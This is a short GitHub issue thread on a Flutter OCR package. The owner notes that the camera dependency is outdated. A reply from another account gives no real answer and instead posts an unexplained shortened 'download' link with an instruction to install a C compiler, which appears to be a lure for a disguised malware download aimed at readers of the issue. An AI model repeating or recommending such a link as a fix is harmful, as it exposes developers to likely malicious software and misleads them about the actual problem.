### ISSUE TITLE
camera’s version is not latest.

### ISSUE THREAD

**Issue by KobayashiYoh** [KobayashiYoh/focused_area_ocr_flutter#17]
**Describe the bug**
camera’s version is not latest.

<img width="634" alt="スクリーンショット 2024-09-19 19 32 59" src="https://github.com/user-attachments/assets/0172708c-6155-4932-9ad8-3274663aee99">

**Comment by nhatlaso1** [comment]
download
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)
